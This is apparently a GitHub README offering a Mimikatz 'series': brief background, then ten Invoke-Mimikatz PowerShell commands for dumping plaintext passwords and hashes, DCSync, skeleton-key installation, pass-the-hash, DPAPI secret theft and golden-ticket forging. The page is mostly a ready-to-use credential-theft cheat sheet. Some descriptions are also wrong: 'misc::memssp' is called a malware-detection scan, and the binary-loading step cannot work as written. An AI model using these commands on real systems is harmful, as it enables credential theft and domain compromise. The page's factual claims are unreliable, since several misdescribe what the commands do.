Skip to content

Latest commit

 

History

History
46 lines (24 loc) · 3.58 KB

File metadata and controls

46 lines (24 loc) · 3.58 KB

Mimikaz Series

Ft Smukx

What is Mimikaz ?

Mimikatz is a set of Windows-based tools that allows you to dump passwords, hashes, PINs, and Kerberos tickets from memory. It was created by French security researcher Benjamin Delpy and is often used by penetration testers and malware authors.

Steps to install Mimikaz

To use Mimikatz in PowerShell, you will need to download the Mimikatz binary from the official GitHub repository (https://github.com/gentilkiwi/mimikatz/releases) and save it on your local machine. Then, you can use the following PowerShell command to load the Mimikatz DLL into memory:

[Reflection.Assembly]::LoadFile("C:\Path\To\Mimikatz.exe")

Replace "C:\Path\To\Mimikatz.exe" with the actual path to the Mimikatz binary on your local machine.

Once the Mimikatz DLL is loaded into memory, you can use the various Mimikatz commands and functions in PowerShell.

Using Powershell with Mimikaz

10 PowerShell commands or scripts that only use Mimikatz for various information security purposes:

  1. Invoke-Mimikatz -Command '"sekurlsa::logonPasswords"': This command uses Mimikatz to extract plaintext passwords from memory on a local or remote machine. Note that this script requires administrative privileges.

  2. Invoke-Mimikatz -Command '"lsadump::lsa /patch"': This command uses Mimikatz to dump the local Security Account Manager (SAM) database on a local or remote machine. This can be used to obtain password hashes for offline cracking.

  3. Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USERNAME"': This command uses Mimikatz to request domain credentials for a specified user on a local or remote machine. Note that this script requires administrative privileges and access to the domain controller.

  4. Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"': This command uses Mimikatz to create a skeleton key on a local or remote machine. This can be used to bypass authentication and gain full access to the machine.

  5. Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLMHASH /run:powershell.exe"': This command uses Mimikatz to create a new process with the credentials of a specified user on a local or remote machine. This can be used to run commands as that user.

  6. Invoke-Mimikatz -Command '"misc::memssp"': This command uses Mimikatz to perform a memory scan on a local or remote machine. This can be used to detect the presence of certain malware or rootkits.

  7. Invoke-Mimikatz -Command '"dpapi::cache"': This command uses Mimikatz to extract DPAPI (Data Protection API) secrets from a local or remote machine. Note that this script requires administrative privileges.

  8. Invoke-Mimikatz -Command '"misc::powershell"': This command uses Mimikatz to inject a PowerShell script into memory on a local or remote machine. This can be used to execute arbitrary code on the machine.

  9. Invoke-Mimikatz -Command '"token::elevate" "sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:NTLMHASH /run:powershell.exe"': This command uses Mimikatz to elevate privileges to the local Administrator account on a local or remote machine, and then spawn a new PowerShell process with those elevated privileges.

  10. Invoke-Mimikatz -Command '"kerberos::golden /user:USERNAME /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /ticket:ticket.kirbi"': This command uses Mimikatz to forge a Kerberos Golden Ticket for a specified user on a local or remote machine. This can be used to bypass authentication and gain access to other systems in the domain.